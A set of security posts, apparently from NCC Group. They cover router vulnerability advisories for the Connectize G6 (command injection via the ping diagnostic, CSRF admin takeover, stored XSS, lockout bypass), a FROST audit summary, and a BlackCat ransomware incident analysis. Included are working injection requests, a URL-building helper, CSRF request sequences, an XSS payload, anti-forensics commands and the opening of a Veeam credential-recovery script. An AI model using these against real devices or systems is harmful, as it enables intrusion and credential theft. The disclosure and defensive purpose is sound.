  2. Systemic Insecure Credential Management (CVE-2023-24047)
  3. Admin Panel Vulnerable to Cross Site Request Forgery (CVE-2023-24048)
  4. Weak Default Wi-Fi Network Password (CVE-2023-24049)
  5. Stored Cross Site Scripting using Wi-Fi Password Field (CVE-2023-24050)
  6. Admin Panel Account Lockout and Rate Limiting Bypass (CVE-2023-24051)
  7. Current Password Not Required When Changing Admin Password (CVE-2023-24052)

Attack Scenarios

The nature of these vulnerabilities allows a motivated attacker to perform an attack chain combining multiple of these issues, potentially leading to full unauthenticated access to the admin panel, a pivot point on the user’s home network for further attacks, and arbitrary JavaScript code execution in the victim’s browser.

Scenario 1 – Attacker Not on the Network

An attacker not present on the Wi-Fi network can obtain a foothold onto the network, as well as total admin panel compromise, via the following steps. First, the attacker sends a phishing email to the target. The email induces the victim to visit the attacker's website, which allows the attacker to send HTTP requests from the victim's browser. If the victim is logged in to the administration panel of their router, the attacker can leverage CVE-2023-24048 to send requests to the web application on the victim's behalf, effectively granting them administrative access at this time.

However, this is temporary – the attacker only has this access while the victim remains logged in to the administrative panel. The attacker's next step is to change the victim's password, guaranteeing them access to the admin panel and locking out the victim. They can perform this easily, as the current password is not required to perform this sensitive action (CVE-2023-24052).

From here, they can utilize CVE-2023-24046 to pivot their attack, as this vulnerability grants the attacker complete command line access to the router itself, and in doing so, gives the attacker a device on the victim’s network that they control. From here, they could transition to traditional network based post-exploitation attacks, such as sniffing traffic and attempting to exploit vulnerabilities on other machines in the network. Furthermore, due to the known insecure hashing algorithms used to protect the sensitive router credentials (CVE-2023-24047), they can ensure that even in the event they lose access to the admin panel, they can recover the password by checking the router’s /etc/passwd file.

Scenario 2 – Attacker on the Network

Alternatively, rather than starting with a targeted phishing attack, an attacker who already has access to the home network (such as a guest in the home) could attempt to elevate from a normal user to an administrator via brute-force password guessing.

The admin panel has an account lockout intended to prevent this: after making three failed guesses, a user is informed they must wait 180 seconds before attempting another guess. However, as shown in CVE-2023-24051, the attacker can refresh the browser to reset this timer, or could use automation to send these requests without the browser pop-up's interference in the first place.

If the victim has set a strong password, this will still take a significant amount of time. However, as the router requires a minimum length of 5 characters rather than the industry-standard recommended minimum of 8 characters, brute forcing becomes viable if the chosen password is weak. If the password was never changed from the default value of admin, the attacker can gain access in one guess (CVE-2023-24049).
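The gap between a 5-character and an 8-character minimum can be made concrete with a back-of-envelope keyspace calculation (the guess rate below is an illustrative assumption for offline cracking of a fast hash, not a measured figure for this device):

```python
# Back-of-envelope comparison of the keyspace for the router's 5-character
# minimum versus the recommended 8-character minimum. OFFLINE_RATE is an
# assumed guesses/second figure for a fast legacy hash (see CVE-2023-24047).

PRINTABLE = 95        # printable ASCII characters
OFFLINE_RATE = 1e9    # assumed guesses per second (illustrative)

def seconds_to_exhaust(length: int, rate: float = OFFLINE_RATE) -> float:
    """Worst-case time to try every password of the given length."""
    return PRINTABLE ** length / rate

print(f"5 characters: {PRINTABLE**5:,} candidates, "
      f"{seconds_to_exhaust(5):.0f} s to exhaust")
print(f"8 characters: {PRINTABLE**8:,} candidates, "
      f"{seconds_to_exhaust(8) / 86400:.0f} days to exhaust")
```

Even at an aggressive assumed rate, the 5-character keyspace falls in seconds while the 8-character keyspace takes orders of magnitude longer; online guessing against the admin panel would be slower still, but the lockout bypass in CVE-2023-24051 removes the main obstacle.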

They can, of course, also exploit any of the vulnerabilities noted under Scenario 1 in addition to the brute force approach.

Scenario 3 – Malware

Assuming our attacker has gained access to the admin panel, either via CSRF or via the brute force method, the attacker can choose to perform further exploits via cross-site scripting. They could choose to set the password for one of the two Wi-Fi networks (2.4 GHz or 5 GHz) to an exploit string, and upon the rightful admin logging in to investigate, the attacker is able to run arbitrary JavaScript in the victim's browser.

Disclosure

NCC Group attempted to get in contact with Connectize’s support team, reaching out via a customer support email address. After receiving no response to our initial email or a follow up email a reasonable amount of time later, it was decided to publicly release the following advisories in accordance with NCC Group’s responsible disclosure policies. From web searches and open source research, it appears that the Connectize vendor ceased trading some time in early 2023 – the last cached version of their website on the Internet archive was March 29th 2023. Their website no longer exists and there is no mechanism to contact them. The disclosure timeline can be found at the bottom of this page.

It is important that consumers are aware of the vulnerable Connectize devices. Any current owners and users of Connectize devices should seek to replace them with a different, more secure brand of device as soon as possible, since the vulnerabilities present in these devices will never be fixed as a result of the vendor no longer existing. Similarly, for consumers looking to purchase a Wi-Fi router – be aware that at the time of writing, many popular online stores still stock and sell these vulnerable Connectize devices. In the background NCC Group is currently liaising with some of these online stores in an attempt at ensuring these devices are withdrawn from sale.

Technical Advisories

Command Injection via Ping Diagnostic Functionality (CVE-2023-24046)

Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24046
Severity: High 8.4 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

Summary

An attacker authenticated to the admin panel can run arbitrary commands on the physical device.

Impact

After exploitation, an attacker will have complete control over the target system, and will be in a position to perform post-exploitation tasks throughout the network.

Details

The ping functionality on the router diagnostics page http://192.168.5.1/diag_ping_admin.htm is used to set the IP address that pings are sent to. However, an attacker can concatenate a command to the end of the address as follows, which then executes as a command on the underlying system.

The following request shows the output of the ls command, listing the files and directories at the root of the HTTP server.

Request

GET /getPingResult.asp?ip_version=0&target_addr=192.168.5.1;+ls;&target_num=2 HTTP/1.1
Host: 192.168.5.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.5.1/diag_ping_admin.htm

Response

HTTP/1.1 200 OK
Date: Tue, 10 Jan 2023 22:59:36 GMT
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Content-Length: 371
Last-Modified: Tue, 10 Jan 2023 22:59:36 GMT
Content-Type: text/html

PING 192.168.5.1 (192.168.5.1): 56 data bytes
<br />64 bytes from 192.168.5.1: seq=0 ttl=64 time=0.293 ms
<br />64 bytes from 192.168.5.1: seq=1 ttl=64 time=0.262 ms
<br />
<br />--- 192.168.5.1 ping statistics ---
<br />2 packets transmitted, 2 packets received, 0% packet loss
<br />round-trip min/avg/max = 0.262/0.277/0.293 ms
<br />boa.conf
<br />mime.types
<br />

Observe the lines:

<br />boa.conf
<br />mime.types
<br />

These files are present in the /etc/boa directory of the router, indicating that the ls command successfully executed and the output was returned to the user.

An attacker can go further with this and construct a convenient user interface for interacting with the vulnerability in a shell-like manner. With such a shell an attacker can much more easily navigate the file system and run commands on the device. They can then elevate their access to something more direct, such as through activating the BusyBox Telnet functionality on the device and obtaining a telnet shell.
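The shell-like wrapper described above amounts to URL-encoding each command into the target_addr parameter of the vulnerable endpoint. A minimal sketch of how such a request is constructed, using the parameter names from the captured request (for testing your own device only; the helper name is mine):

```python
# Sketch of how the injected request from the advisory is constructed:
# the shell command is appended to target_addr, separated by semicolons,
# and the whole query string is URL-encoded.
from urllib.parse import urlencode

def build_injection_url(host: str, command: str) -> str:
    """Build the getPingResult.asp URL with `command` injected into
    target_addr (parameter names taken from the captured request)."""
    params = {
        "ip_version": "0",
        "target_addr": f"192.168.5.1;{command};",
        "target_num": "2",
    }
    return f"http://{host}/getPingResult.asp?" + urlencode(params)

print(build_injection_url("192.168.5.1", "ls"))

# A shell-like loop would simply read commands, fetch this URL with an
# authenticated HTTP client, and print the response body.
```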

Recommendation

Connectize should implement input validation to ensure that the values passed to the target_addr parameter are only IP addresses or domain names, and do not contain any commands. Any value that is not an IP address or a domain name should be rejected.

Systemic Insecure Credential Management (CVE-2023-24047)

Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24047
Severity: Medium 4.5 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)

Summary

The same password used for logging into the web admin interface is used as the root password for the device. Furthermore, the password is stored insecurely on the device via an outdated and insecure hashing algorithm.

Impact

Anyone capable of accessing the router’s file system is able to trivially recover both the Root password for the device and the password for the admin panel.

Details

The Connectize Router uses the admin panel password, as set by the user, as the root password on the device. The password is stored in /etc/passwd, and appears to be hashed using the legacy DES-based crypt scheme. DES-based crypt is a known insecure hashing algorithm that should no longer be used. Because this hash can be computed very quickly, hashed passwords are vulnerable to brute-force cracking. An attacker with access to the hashed passwords is likely to be able to recover significant numbers of plaintext passwords using a tool such as hashcat.

Several other important passwords, such as the SMB fileshare password, were also observed to be hashed using DES.

Recommendation

Update the hashing algorithms used for device credentials to a more secure, modern algorithm. Furthermore, consider setting the root machine password to its own unique value, rather than deriving it from the admin configuration panel password.

Admin Panel Vulnerable to Cross Site Request Forgery (CVE-2023-24048)

Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24048
Severity: High 7.5 (CVSS v3.1 AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)

Summary

The web application authentication relies on state tracking to ensure that the user is properly authenticated. This can be bypassed, allowing unauthenticated users to submit requests to the application under certain conditions.

Impact

If an authenticated user visits an attacker-controlled website, the attacker could induce the victim’s browser to send local requests to the application on behalf of the victim user. These requests could be used to make changes to the site, such as changing the admin password or configuring remote logs. It could also be used to leverage other vulnerabilities, such as CVE-2023-24046, a command line injection vulnerability.

In order to perform this attack, the victim must be logged in to the administration panel on the device’s network, but the attacker can be positioned anywhere on the public internet.

Details

The Connectize admin panel application appears to track authentication via two mechanisms. First, ensuring the user is logged in (likely via IP based or MAC address based verification). Next, it tracks the recent actions taken by the user in an attempt to verify that the request was sent as part of the typical user activity flow. This second check can be bypassed in a way that grants any individual who launches a phishing campaign against a logged-in administrator access to the admin panel. This can be done using an attack known as CSRF, which is explained below.

The lack of sufficient protections illustrated in this finding apply to the whole application, but are most significant in the user flow for changing the administrator password. This flow begins with a POST request to /boafrm/formPasswordSetup.

POST /boafrm/formPasswordSetup HTTP/1.1
Host: 192.168.5.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 87
Origin: http://192.168.5.1
Connection: close
Referer: http://192.168.5.1/man_password.htm

submit-url=%2Fman_password.asp&saveFlag=0&userName=admin&newPass=myPassword&confPass=myPassword

If a user sends this request without being logged in, they are redirected to the login page. If, however, a user sends this request while logged in but before they have accessed the password request page at http://192.168.5.1/man_password.htm, they are assumed to have bypassed the normal user flow of the application and are served a 403 Forbidden error. This appears to be intended to ensure that only the authenticated user may send requests to the application as part of normal administrative duties.

However, an attacker can successfully fill the required conditions for this request by simply sending a HTTP GET request to the man_password.htm page, such as the following.

GET /man_password.htm HTTP/1.1
Host: 192.168.5.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.1/advanced.htm
Connection: close
Upgrade-Insecure-Requests: 1

They then receive a HTTP 200 response containing the contents of the web page.

An attacker, therefore, could bypass this check and allow themselves to programmatically change the password by simply using a tool or writing a script that sent the GET request to /man_password.htm shortly before performing the POST request to /boafrm/formPasswordSetup and changing the administrator password.

This attack can be delivered through a phishing attack prompting the victim to navigate to an attacker's website. The webpage would be configured as follows: upon browsing to the website, the page sends a GET request from the victim's browser to the address http://192.168.5.1/man_password.htm. If the victim has a Connectize G6 router and is currently logged in to the admin panel, this will respond with a 200 OK. The webpage would then send the second request, a POST request to http://192.168.5.1/boafrm/formPasswordSetup. This request will change the admin password to anything the attacker desires. They then have complete control of the router, and can send additional requests using their phishing site to make changes and configure the application as they wish. They could even make use of other findings, such as CVE-2023-24046, to take complete command of the device.

This type of attack is known as Cross-Site Request Forgery (CSRF). It is characterized by an attacker using a logged in victim’s session to perform actions on their behalf. CSRF is typically an attack that requires the victim to open the vulnerable website and the attacker’s phishing website, to transfer authentication cookies along with the requests. However, because the Connectize G6 router does not make use of session tokens, authentication cookies, or CSRF tokens, the attack works even if the phishing website is viewed in a different browser on the same machine that the victim had loaded the Connectize G6 admin panel on.
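The GET-then-POST sequence described above can be sketched as follows. The form field names come from the captured request earlier in this advisory; the commented driver assumes the `requests` library and the default router address, and is for testing your own device only:

```python
# Sketch of the state-check bypass described above: one GET to satisfy the
# "visited the password page" check, then the password-change POST.

def password_form(new_password: str) -> dict:
    """Form body for /boafrm/formPasswordSetup (field names taken from
    the captured request in this advisory)."""
    return {
        "submit-url": "/man_password.asp",
        "saveFlag": "0",
        "userName": "admin",
        "newPass": new_password,
        "confPass": new_password,
    }

# Hedged driver (requires the `requests` library and your own device):
#   import requests
#   s = requests.Session()
#   s.get("http://192.168.5.1/man_password.htm")        # satisfy state check
#   s.post("http://192.168.5.1/boafrm/formPasswordSetup",
#          data=password_form("new-password"))
```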

Recommendation

Implement a CSRF token as part of the authentication model. If possible, replace the state-based authentication with a more traditional authentication system, such as session cookie based authentication.

Applications can be protected from CSRF attacks by rejecting state-changing requests that do not originate from the application itself. The primary method of verifying that a request originated from the application rather than an external site is to require all state-changing requests to contain an extra parameter known as a CSRF token. These tokens are random values generated by the server, returned to the browser in the body of a response or in a cookie, and submitted as an additional parameter with every state-changing request.
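A minimal sketch of token issuance and constant-time validation on the server side (generic Python for illustration, not router firmware code; the in-memory store and function names are mine):

```python
# Minimal sketch of CSRF token issuance and validation as recommended
# above. Tokens are unguessable random values tied to a session, and
# comparison is constant-time to avoid timing side channels.
import hmac
import secrets

_issued: dict = {}  # session id -> token (in-memory demo storage)

def issue_token(session_id: str) -> str:
    """Generate and record a fresh CSRF token for this session."""
    token = secrets.token_urlsafe(32)
    _issued[session_id] = token
    return token

def validate_token(session_id: str, submitted: str) -> bool:
    """Accept a state-changing request only if the submitted token
    matches the one issued to this session."""
    expected = _issued.get(session_id)
    if expected is None:
        return False
    return hmac.compare_digest(expected, submitted)
```

Because an attacking site cannot read the token out of the application's responses, forged cross-site requests fail this check.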

Because an attacking site cannot read the application’s cookies or responses, they will be unable to submit the correct value, and any forged request will be rejected.

Weak Default Wi-Fi Network Password (CVE-2023-24049)

Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24049
Severity: Medium 4.6 (CVSS v3.1 AV:A/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L)

Summary

It was found that the default password to both the router and the admin panel of the Connectize G6 router were trivially guessable by attackers, and are not required to be reset upon initial configuration.

Furthermore, the router provides the option to automatically set the admin panel password to the same password used to connect to the Wi-Fi.

Impact

An attacker present on the 2.4 or 5 GHz Wi-Fi Networks could trivially guess both the Wi-Fi network password and the admin password, if they have been left unchanged from their factory default. This would allow the attacker to gain complete admin access to the router.

Additionally, in some configurations, a user with credentials sufficient to connect to the Wi-Fi network could have full admin access to the router by default.

Details

The device’s default Wi-Fi password is admin, as described both in the router instruction manual and on the sticker on the bottom of the device. This password can also be used to log on to the configuration panel.

Upon initial setup, the user is prompted to set a new password. However, they can bypass this by selecting the “Skip Wizard” option, leaving the passwords at the default.

Furthermore, if a user does proceed to set a new Wi-Fi password, they are presented with a checkbox that sets the admin panel login password to the same value as the Wi-Fi password. This grants full administrative access to all users with access to the Wi-Fi password, even when a non-default password is used.

Recommendation

Connectize should ensure that the router requires users to always change the Wi-Fi password from default upon first login, and should remove the “Skip Wizard” functionality that allows users to bypass this.

Additionally, Connectize should remove the option to set the admin interface password to the same password as the Wi-Fi password shown during initial configuration.

Stored Cross Site Scripting using Wi-Fi Password Field (CVE-2023-24050)

Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24050
Severity: Medium 4.3 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L)

Summary

An attacker who can change the Wi-Fi password can change the password to a carefully crafted Cross Site Scripting string, such as "><script>alert(1)</script>. This string is stored in the router’s data storage application, then incorporated in pages throughout the application, allowing an attacker to run arbitrary JavaScript whenever the string is loaded onto a page.

As this finding requires an attacker to be authenticated, the impact is somewhat limited. However, it can be exploited unauthenticated when combined with attacks such as CVE-2023-24048. Additionally, in a circumstance where multiple individuals share the admin panel credentials, one user could run arbitrary JavaScript in the browsers of all other users.

Impact

An attacker that has gained access to the admin panel can run arbitrary JavaScript code whenever anyone logs in or views various pages in the admin panel. This could be used to query external webpages, steal sensitive information, or perform other privileged actions.

Details

Cross-site scripting (XSS) is a vulnerability class related to web application input and output validation. In stored cross-site scripting, the application accepts input from an end user, stores it, and later displays it without properly encoding HTML metacharacters. This allows an attacker to inject JavaScript code into future views of the resulting page. A user may fall victim to the attack just by using the application, provided that they have connected to either of the Wi-Fi networks or the LAN network provided by the router.

The attacker does not need to change the passwords for both the 2.4 and 5 GHz bands. Simply changing one is sufficient, potentially allowing this attack to go undetected by people using the other network.

Recommendation

When including user submitted data in responses to end users, encode the output based on the appropriate context of where the output is included.

Content placed into HTML needs to be HTML-encoded. To work in all situations, HTML encoding functions should encode the following characters: single and double quotes, backticks, angle brackets, forward and backslashes, equals signs, and ampersands. User-submitted data should not be included in dynamically-generated JavaScript snippets. Instead, encode and return the content in a separate HTML element or API request.
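
For example, Python’s standard-library escaping (shown purely as an illustration of the principle; the router’s firmware is not Python) neutralises the exact payload from CVE-2023-24050:

```python
import html

# The payload from the finding, which breaks out of an HTML attribute
# and injects a script element when reflected without encoding.
payload = '"><script>alert(1)</script>'

# quote=True also encodes double and single quotes, which is required
# when the value is placed inside an HTML attribute.
encoded = html.escape(payload, quote=True)
print(encoded)  # &quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
```

Once encoded this way, the browser renders the value as inert text rather than parsing it as markup.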

Admin Panel Account Lockout and Rate Limiting Bypass (CVE-2023-24051)

Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24051
Severity: Medium 4.3 (CVSS v3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)

Summary

Applications often make use of rate limiting to prevent brute-force password attempts, sometimes enforced via “locking out” a user and preventing them from making further attempts at guessing the password. The Connectize G6 admin panel contains this functionality, but enforces it on the client-side. This allows a user to bypass it in two different ways.

Impact

An attacker attempting to guess the admin password for the router could make as many attempts as they wish without any limitations or restrictions. Given that the minimum password length is 5 characters, an attacker’s ability to guess the admin password is only limited by their network speed. An attacker with a sufficiently good connection could iterate through all possible five-character passwords reasonably quickly, gaining complete control of the admin panel if a password of minimum length was set.
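
To put that keyspace in perspective, a back-of-the-envelope calculation (assuming the full 95-character printable ASCII set and illustrative guess rates; the router may accept a smaller character set) shows why a five-character minimum without rate limiting is inadequate:

```python
# Candidate passwords of exactly length 5 drawn from the 95 printable
# ASCII characters.
charset = 95
length = 5
keyspace = charset ** length
print(keyspace)  # 7737809375

# At an assumed 1,000 guesses per second over the local network,
# exhausting the keyspace takes roughly 90 days; at 100,000 guesses
# per second it takes under a day.
days_at_1k_per_sec = round((keyspace / 1000) / 86400, 1)
print(days_at_1k_per_sec)  # 89.6
```

With no server-side lockout, the only limiting factor is how fast the device can answer login requests.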

Details

There are two methods to bypass the lockout functionality. Anyone accessing the user interface at 192.168.5.1 via a web browser may attempt to guess the password. After three failed attempts, a popup informs the user they must wait 180 seconds before guessing again.

If the user then refreshes the page, the popup is no longer shown, and the user may make another guess. If this guess is correct, the user is logged in to the admin panel, bypassing the lockout.

Alternatively, a user submitting HTTP requests directly to the application, such as through tools like Burp Suite or Postman, is never shown this prompt to begin with. Failed login requests return an HTTP 302 redirecting the user to the login page, while successful ones redirect the user to the index of the application.

An attacker could trivially automate sending hundreds or thousands of requests in this way, and never encounter the lockout mechanism.

Recommendation

Connectize should implement rate limiting in the application’s server-side code rather than in client-side JavaScript. Doing so would prevent both of the bypasses described above and help mitigate brute-force attacks against the application.

Current Password Not Required When Changing Admin Password (CVE-2023-24052)

Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24052
Severity: Medium 4.3 (CVSS v3.1 AV:A/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N)

Summary

The admin panel web application does not require the user to provide the current admin password when changing the credentials.

Impact

An attacker who has gained access to the admin panel without obtaining the credentials first could change the password, locking out the legitimate users and granting themselves indefinite access until the device is factory reset.

Details

It is considered best practice to require a user to authenticate before changing or accessing sensitive information, such as an administrative password. A user who gains access to the admin panel via an unrelated vulnerability, or via access to a logged in computer owned by the legitimate user, could trivially change the password.

Given that the admin panel is also vulnerable to CSRF attacks, as described in CVE-2023-24048, this in effect allows anyone who is successful in a CSRF phishing attempt to change the admin password.

Recommendation

Require users to provide the old password when they change the administrator password.
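
A hedged sketch of what that check looks like (the credential store and function names are illustrative assumptions, not the router’s actual implementation):

```python
import hashlib
import hmac
import os

# Illustrative credential store: a salted PBKDF2 hash of the admin password.
_salt = os.urandom(16)
_stored = hashlib.pbkdf2_hmac("sha256", b"current-password", _salt, 100_000)

def change_password(current: str, new: str) -> bool:
    """Rotate the credential only if the caller proves knowledge of it."""
    global _salt, _stored
    candidate = hashlib.pbkdf2_hmac("sha256", current.encode(), _salt, 100_000)
    if not hmac.compare_digest(candidate, _stored):
        return False  # reject: wrong (or missing) current password
    _salt = os.urandom(16)
    _stored = hashlib.pbkdf2_hmac("sha256", new.encode(), _salt, 100_000)
    return True
```

With this check in place, an attacker riding a logged-in session (for example via the CSRF issue in CVE-2023-24048) cannot lock out the legitimate administrator without already knowing the password.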

Disclosure Timeline

March 3rd, 2023: NCC Group reached out to Connectize, announcing that vulnerabilities had been found in one of their devices and attempting to initiate a secure conversation regarding these vulnerabilities.

April 7th, 2023: NCC Group reached out to Connectize again (not having heard back in response to the prior email) to inform them of its intent to publicly disclose the bugs unless the vendor responded within the next 30 days.

As of the publishing date of this Technical Advisory, no further communication has occurred and it appears that the Connectize vendor has ceased trading.

It is important that consumers are aware of the vulnerable Connectize devices. Current owners and users of Connectize devices should replace them with a different, more secure brand of device as soon as possible, since the vulnerabilities present in these devices will never be fixed now that the vendor no longer exists. Similarly, consumers looking to purchase a Wi-Fi router should be aware that, at the time of writing, many popular online stores still stock and sell these vulnerable Connectize devices. In the background, NCC Group is liaising with some of these online stores in an attempt to ensure these devices are withdrawn from sale.

Thanks to

David Goldsmith, Nicholas Bidron, and Eli Sohl for their support throughout the research and disclosure process.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Written by: Jay Houppermans

Public Report – Zcash FROST Security Assessment

23 October 2023 at 12:06

In Summer 2023, the Zcash Foundation engaged NCC Group to conduct a security
assessment of the Foundation’s FROST threshold signature implementation, based on the
paper FROST: Flexible Round-Optimized Schnorr Threshold Signatures. This project
implements v12 of the draft FROST specification in Rust, with a variety of options available
for underlying elliptic curve groups. The review was performed by three consultants over 25 person-days of effort. The project concluded with a retest phase a few weeks after the original engagement that confirmed all findings were fixed.

Unveiling the Dark Side: A Deep Dive into Active Ransomware Families 

Not so lucky: BlackCat is back! 

Authors: Alex Jessop @ThisIsFineChief , Molly Dewis 

While the main trend in the cyber threat landscape in recent months has been MOVEit and Cl0p, NCC Group’s Cyber Incident Response Team has also been handling multiple different ransomware groups over the same period.

In the ever-evolving cybersecurity landscape, one consistent trend witnessed in recent years is the unsettling rise in ransomware attacks. These nefarious acts of digital extortion have left countless victims scrambling to safeguard their data, resources, and even their livelihoods. To counter this threat, everyone in the cyber security industry has a responsibility to shine a light on current threat actor Tactics, Techniques and Procedures (TTPs) to assist in improving defences and the overall threat landscape.

This series will focus on TTPs deployed by four ransomware families recently observed during NCC Group’s incident response engagements. The ransomware families that will be explored are:

  1. BlackCat – Also known as ALPHV, first observed in 2021, is a Ransomware-as-a-Service (RaaS) often using the double extortion method for monetary gain.
  2. Donut – The D0nut extortion group was first reported in August 2022 [1] for breaching networks and demanding ransoms in return for not leaking stolen data. A few months later, reports of the group utilizing encryption as well as data exfiltration were released, with speculation that the ransomware deployed by the group was linked to HelloXD ransomware [2]. There are also suspected links between D0nut affiliates and both the Hive and Ragnar Locker ransomware operations.
  3. Medusa – Not to be confused with MedusaLocker, Medusa was first observed in 2021 and is a Ransomware-as-a-Service (RaaS) often using the double extortion method for monetary gain. In 2023 the group’s activity increased with the launch of the ‘Medusa Blog’. This platform serves as a tool for leaking data belonging to victims.
  4. NoEscape – At the end of May 2023, a newly emerged Ransomware-as-a-Service (RaaS) named NoEscape was observed on a cybercrime forum.

Join us as we delve into the inner workings of these ransomware families, gaining a better understanding of their motivations, attack vectors and TTPs.

To begin our deep dive we will start with…  

Not so lucky: BlackCat is back! 

Summary

This first post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving BlackCat Ransomware.  

Below is a summary of the findings presented in this blog post:

  • Installation of various services. 
  • Creation of new accounts. 
  • Modification and deletion activity.  
  • Credential dumping activity. 
  • Use of remote access applications. 
  • Data staging. 
  • Presence of MEGAsync.  
  • Analysis of the ransomware executable.

BlackCat

BlackCat ransomware, also known as ALPHV, is a Rust-based variant that was first seen in November 2021. BlackCat operates under a ransomware-as-a-service (RaaS) model and is an example of double-extortion ransomware, where data is exfiltrated before being encrypted and the victim is threatened with having their data published if the ransom is not paid [1]. The group behind BlackCat ransomware can be characterised as financially motivated. BlackCat ransomware targets no specific industry and has the capability to encrypt both Windows and Linux hosts. BlackCat ransomware uses AES to encrypt files, or ChaCha20 if AES is not supported by the system’s hardware [4].

Incident Overview  

In this incident, the initial access vector was unknown. Prior to the execution of the ransomware, a wide variety of activity was observed such as the installation of new services, creation of new accounts and data staging. Data was believed to have been exfiltrated due to the techniques employed, however, no data was published to the leak site.  

Mitre TTPs  

Execution 

The threat actor installed various new services: 

  • Total Software Deployment Audit Service 
  • HWiNFO Kernel Driver 
  • ScreenConnect Client 
  • PSEXESVC 
  • AteraAgent 
  • WinRing0_1_2_0 
  • Splashtop® Remote Service

Additionally, BlackCat ransomware uses wmic.exe Shadowcopy Delete to delete shadow copies.

Persistence 

Maintaining access to the victim’s environment was achieved by the threat actor creating a new Administrator account and a new default admin user, azure.  

Additionally, a Total Software Deployment Audit Service Windows service was installed (see below); likely to maintain persistence on the affected host. Total Software Deployment supports group deployment, maintenance, and uninstallation of software packages. BlackCat ransomware is known to use Total Software Deployment [3]. 

{“EventData”:{“Data”:[{“@Name”:”ServiceName”,”#text”:”Total Software Deployment Audit Service”},{“@Name”:”ImagePath”,”#text”:”\”%SystemRoot%\\TNIWINAGENT\\tniwinagent.exe\” /service /ip:<IP ADDRESS> /login:\”current\” /driver:2″},{“@Name”:”ServiceType”,”#text”:”user mode service”},{“@Name”:”StartType”,”#text”:”demand start”},{“@Name”:”AccountName”,”#text”:”LocalSystem”}]}} 

Defence Evasion 

The threat actor utilised various techniques to hide their tracks and evade detection: 

  • Using an already existing administrator account to clear the following log files: 
    • System 
    • Windows PowerShell 
    • WitnessClientAdmin 
  • The ransomware payload, min.exe, used wevtutil.exe cl. 
  • Deleting the ransomware executable from C:\Users\azure\Desktop\min.exe. 
  • The ransomware payload, min.exe, had the capability to add this registry key to maintain persistence: 
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters.
  • The ransomware payload, min.exe, using fsutil behavior set SymlinkEvaluation R2R:1 to redirect file system access to a different location once access to the network is gained.

Credential Access 

Various techniques to gather credentials were employed by the threat actor.  

Due to the presence of Veeam in the victim’s environment, C:\PerfLogs\Veeam-Get-Creds.ps1 below was leveraged to recover passwords used by Veeam to connect to remote hosts.  

# About:  The script is designed to recover passwords used by Veeam to connect
#         to remote hosts vSphere, Hyper-V, etc. The script is intended for
#         demonstration and academic purposes. Use with permission from the
#         system owner.
#
# Author: Konstantin Burov.
#
# Usage:  Run as administrator (elevated) in PowerShell on a host in a Veeam
#         server.

Add-Type -assembly System.Security

#Searching for connection parameters in the registry
try {
 $VeaamRegPath = "HKLM:\SOFTWARE\Veeam\Veeam Backup and Replication\"
 $SqlDatabaseName = (Get-ItemProperty -Path $VeaamRegPath -ErrorAction Stop).SqlDatabaseName
 $SqlInstanceName = (Get-ItemProperty -Path $VeaamRegPath -ErrorAction Stop).SqlInstanceName
